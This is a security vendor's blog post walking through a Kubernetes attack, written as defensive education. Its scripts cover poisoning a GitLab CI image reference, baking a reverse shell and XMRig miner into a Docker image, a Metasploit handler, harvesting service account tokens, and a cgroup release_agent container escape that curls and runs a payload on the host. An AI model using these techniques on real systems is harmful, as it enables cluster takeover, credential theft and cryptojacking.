Anatomy of a Kubernetes Attack - How Untrusted Docker Images Fail Us
PART TWO OF A SERIES.
In the first part of this blog series, Infrastructure as Code: Terraform, AWS EKS, Gitlab & Prisma Cloud, I went through the scenario of building out an Amazon EKS cluster using Terraform and a VCS integration with Gitlab. I also covered an initial Daemonset deployment of the Palo Alto Networks Prisma agent to the nodes on the newly provisioned cluster. In the second part of this series, we will look at some aspects of a Kubernetes attack and in a follow-up installment, how Palo Alto Networks Prisma Compute can be used to prevent related Kubernetes attacks.
Microsoft recently released a Kubernetes attack matrix (similar to MITRE’s ATT&CK framework) that I feel is a good reference for walking through some aspects of an example Kubernetes attack. For this blog, I’ll be covering techniques in the Initial Access, Execution, Persistence and Privilege Escalation tactic phases.
Figure 1: Microsoft Kubernetes ATT&CK Matrix
The environment I’m using for this blog is an Amazon EKS cluster with no Prisma agents installed to demonstrate the various stages of an attack. I also have a second EKS cluster that is running Prisma that I’ll use in the next blog to demonstrate how Prisma can protect the cluster. The CI/CD pipeline I’m using incorporates Gitlab Enterprise and a public Docker image repository. The C2 being used is from a Metasploit console, also hosted in AWS.
Figure 2: Vulnerable Amazon EKS Cluster
Imagine a scenario where a software developer unknowingly had their workstation compromised. During the breach, the attacker was able to collect the dev’s version control system (VCS) credentials. With the dev’s stolen credentials, the attacker plans to use the CI/CD pipeline to deploy a poisoned docker image to the Kubernetes cluster. This could either be done by backdooring a trusted image and pushing the updated image to the trusted repository (as was done previously by Optiv’s Dan Kiraly in his Azure container breakout blog series) or by changing a callout in the CI/CD build code to pull the image from a different source, which in my case, is a poisoned image from a public repository at Docker Hub.
In this scenario, I will work through deployment of the poisoned image into the cluster. This provides a foothold for an attacker to establish a beachhead and escalate privileges, depending on how the K8s cluster and its corresponding pods were deployed.
Figure 3: Docker Hub poisoned image
Figure 4: Changing the image repo path in gitlab-ci.yml from a trusted source to Docker Hub
The poisoned image was created offline and pushed to a publicly accessible Docker repo (see above). For this image, I pulled ubuntu:latest from Docker Hub and loaded the necessary prerequisites, including curl, a reverse listener binary and the cryptocurrency mining software XMRig. Once the image functioned as expected, I pushed it to my Docker repo.
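A minimal sketch of how such an image might be assembled is below. The image name matches the scenario, but the payload file names, COPY paths and build steps are illustrative, not the exact build used for this post:

```shell
# Write a hypothetical Dockerfile for the poisoned image. The payload and
# miner binaries are assumed to already exist in the build context.
cat > Dockerfile <<'EOF'
FROM ubuntu:latest
RUN apt-get update && apt-get install -y curl
# Reverse-shell payload and XMRig miner baked into the image (placeholder paths)
COPY shell-x64.elf /usr/local/bin/shell-x64.elf
COPY xmrig /usr/local/bin/xmrig
RUN chmod +x /usr/local/bin/shell-x64.elf /usr/local/bin/xmrig
# Launch the reverse listener when the container starts
CMD ["/usr/local/bin/shell-x64.elf"]
EOF

# Build and push to the public repo (run where Docker is available):
# docker build -t optivrd/ubuntu:latest .
# docker push optivrd/ubuntu:latest
echo "Dockerfile written"
```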
The figure above shows that I’ve changed the image path in the app’s Gitlab CI file from the trusted Gitlab ubuntu:latest location to the poisoned image available at optivrd/ubuntu:latest on Docker Hub. The next time a deployment is triggered in the CI/CD pipeline, the poisoned image will be pulled from Docker Hub and attached to the deployed container.
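The swap itself is a one-line edit to the CI file. A minimal sketch follows; the job name and the original trusted registry path are hypothetical, and only the optivrd/ubuntu:latest destination comes from this scenario:

```shell
# Create a sample .gitlab-ci.yml referencing a trusted base image
# (the registry path here is illustrative)
cat > .gitlab-ci.yml <<'EOF'
deploy:
  image: registry.gitlab.com/myorg/ubuntu:latest
  script:
    - ./deploy.sh
EOF

# The attacker's one-line edit: point the job at the poisoned Docker Hub image
sed -i 's|registry.gitlab.com/myorg/ubuntu:latest|optivrd/ubuntu:latest|' .gitlab-ci.yml
grep 'image:' .gitlab-ci.yml
```

Because the pipeline trusts whatever the CI file references, no further tampering is needed; the next triggered deployment does the rest.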
The poisoned image contains an embedded reverse listener that connects back to my Metasploit console and provides a shell when the container is deployed. Another option for getting the binary onto the image would be modifying the Dockerfile in the CI/CD pipeline, either downloading the file externally via CMD at container startup or adding the file to the filesystem during the CI/CD build process.
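On the attacker side, the connect-back can be caught with a short Metasploit resource script. A sketch, assuming a generic linux/x64 reverse TCP payload; the LHOST and LPORT values are placeholders, not the actual C2 used in this post:

```shell
# Write a Metasploit resource script that starts a persistent handler
cat > handler.rc <<'EOF'
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 203.0.113.10
set LPORT 4444
set ExitOnSession false
exploit -j
EOF

# Launch it where Metasploit is installed:
# msfconsole -q -r handler.rc
echo "handler.rc written"
```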
Figure 5: Reverse listener session established through Metasploit
Figure 6: Session established with container spawned from poisoned Docker image containing cryptocurrency miner
Figure 7: Listing of the / partition of the container and “whoami” command
We can see from the images above that the container has spawned a connection back to the Metasploit console. With some additional recon, we see that the file system is indeed a container-related system (note the .dockerenv located in /). We can also see from the “whoami” command that the container is running as root.
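Those checks are easy to script. A small sketch of the initial in-container recon, using nothing beyond POSIX shell on the target:

```shell
# Am I in a container? Docker drops a marker file at the filesystem root.
if [ -f /.dockerenv ]; then
  echo "looks like a Docker container"
else
  echo "no /.dockerenv marker found"
fi

# Who am I? uid 0 means the container process runs as root.
echo "user=$(whoami) uid=$(id -u)"
```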
Attackers who have gained partial access to a Kubernetes cluster can use weaknesses in the design and deployment of the cluster to establish persistence. Common issues include overly permissive permissions and failure to use native RBAC. In this scenario, the attacker modified the code in the CI/CD pipeline to attach a poisoned image during the container deployment process. The attacker now gains access to the cluster every time a container with the poisoned image is deployed.
Armed with access and inherited permissions, an attacker could potentially capture the contents of the service account token mounted in the container. In our case, depending on how the container was deployed (e.g. privileged, separate service account, separate namespace), we may be able to get this useful information.
Figure 8: Directory listing of /run/secrets/kubernetes.io/serviceaccount
From the directory listing above, we can see that every file and folder on the container filesystem is owned by root. This indicates that the container is either running as privileged or running as the root user; in either case, a bad practice. Checking the path /run/secrets/kubernetes.io/serviceaccount, we can see that the CA cert, namespace and token are available to us. Even with this information, we still cannot connect to the EKS API server, because we also need AWS API credentials, specifically an Access Key ID and Secret Access Key, which awscli requires for kubectl to connect directly.
In cases where the API server is deployed and configured by the end user (as opposed to the Amazon EKS, Azure AKS and Google GKE managed Kubernetes services), the CA cert, namespace and token would be all that is needed to connect to the API server using kubectl.
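The harvesting step can be scripted. A hedged sketch that reads the mounted credentials if present; the curl call is left commented out because, against a managed EKS endpoint, bearer-token auth alone is insufficient, as noted above:

```shell
# Default mount path for the pod's service account credentials
SA_DIR=/run/secrets/kubernetes.io/serviceaccount

if [ -d "$SA_DIR" ]; then
  TOKEN=$(cat "$SA_DIR/token")
  NAMESPACE=$(cat "$SA_DIR/namespace")
  echo "namespace: $NAMESPACE"
  echo "token length: ${#TOKEN}"
  # Against a self-managed API server this is often sufficient:
  # curl --cacert "$SA_DIR/ca.crt" \
  #      -H "Authorization: Bearer $TOKEN" \
  #      "https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods"
else
  echo "no service account mount at $SA_DIR"
fi
```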
Other examples of risky Kubernetes permissions include listing secrets, service accounts with privileged permissions, user impersonation and the ability to brute force token IDs using default service accounts. With that in mind, it should be noted that securing K8s clusters is a non-trivial exercise and is also difficult to maintain administratively. For example, a default installation of kubeadm has approximately 43 RoleBindings/ClusterRoleBindings, 51 Roles/ClusterRoles and 39 subjects. More information about container security issues and recommendations can be found in NIST SP 800-190.
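Auditing that sprawl is at least scriptable. A sketch using standard kubectl subcommands, wrapped in a function so nothing runs without cluster credentials; the service account queried is the default one:

```shell
# RBAC audit sketch; call audit_rbac from a workstation with cluster access.
audit_rbac() {
  # How many bindings and roles exist cluster-wide?
  kubectl get clusterrolebindings -o name | wc -l
  kubectl get rolebindings --all-namespaces -o name | wc -l
  kubectl get clusterroles -o name | wc -l
  kubectl get roles --all-namespaces -o name | wc -l
  # What is the default service account actually allowed to do?
  kubectl auth can-i --list --as=system:serviceaccount:default:default
}
# audit_rbac
```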
With my reverse listener session established, I now move on to escalating my foothold to the underlying hosts/nodes in the Kubernetes cluster. For this phase, I’ll exploit a vulnerability discovered by security researcher Felix Wilhelm and expanded on by the folks at Trail of Bits. This vulnerability affects Docker containers run with the --privileged flag set and works by abusing the Linux cgroup “notification on release” feature. As this vulnerability demonstrates, launching privileged Docker containers is dangerous and should be avoided in almost all scenarios, due to the full access to host devices and the lack of restrictions from seccomp, AppArmor and other Linux safeguards.
Inside the Docker container, I run the commands to escape the container. Included in the commands is a curl request that downloads my Metasploit reverse listener, sets the executable bit and executes the binary on the underlying host.
Figure 9: Running the container breakout command
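The breakout shown above follows the release_agent proof of concept published by Trail of Bits closely. A hedged reconstruction is below, wrapped in a function so nothing runs by accident; it requires root in a --privileged container, and the C2 URL is a placeholder:

```shell
# release_agent container escape (after Felix Wilhelm / Trail of Bits PoC).
# Call escape_to_host from a root shell inside a --privileged container.
escape_to_host() {
  C2_URL="http://203.0.113.10/shell-x64.elf"   # placeholder C2 address

  # Mount a cgroup v1 hierarchy we control (rdma is typically unused) and
  # create a child cgroup
  mkdir -p /tmp/cgrp
  mount -t cgroup -o rdma cgroup /tmp/cgrp
  mkdir -p /tmp/cgrp/x

  # Ask the kernel to run the release_agent when the child cgroup empties
  echo 1 > /tmp/cgrp/x/notify_on_release

  # Extract this container's overlayfs upperdir, i.e. its path on the host
  host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
  echo "$host_path/cmd" > /tmp/cgrp/release_agent

  # Payload the host will execute as root: fetch and launch the listener
  printf '#!/bin/sh\ncurl -o /tmp/shell-x64.elf %s\nchmod +x /tmp/shell-x64.elf\n/tmp/shell-x64.elf\n' "$C2_URL" > /cmd
  chmod a+x /cmd

  # Join the cgroup from a short-lived shell; when it exits, the kernel
  # invokes /cmd on the host via the release_agent hook
  sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
}
```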
After running the command in the container’s shell, the Metasploit console shows that a host has connected back and a new session has been established. By running the command “uname -a”, I can see from the kernel version and information provided that this is one of my Kubernetes nodes, not the container. I also see that a .dockerenv file is not present in the root of the filesystem. Finally, I can see the shell-x64.elf binary that was downloaded and used for a connection back to my MSF console.
Figure 10: Directory listing of the Kubernetes host after the container breakout
With access to the underlying Kubernetes hosts, I can continue moving through the different phases of the attack framework including Defense Evasion, Credential Access, Discovery and Lateral Movement. My activity could potentially include wiping logs and establishing a more permanent presence on the nodes.
Hopefully this post helped you understand how a single workstation breach could impact an organization’s CI/CD pipeline and infrastructure. In the next blog installment, I’ll be looking at the techniques covered in this attack and demonstrate how Palo Alto Networks Prisma Compute can help to address issues in the CI/CD pipeline and Kubernetes cluster.
Copyright © 2023 Optiv Security Inc. All rights reserved.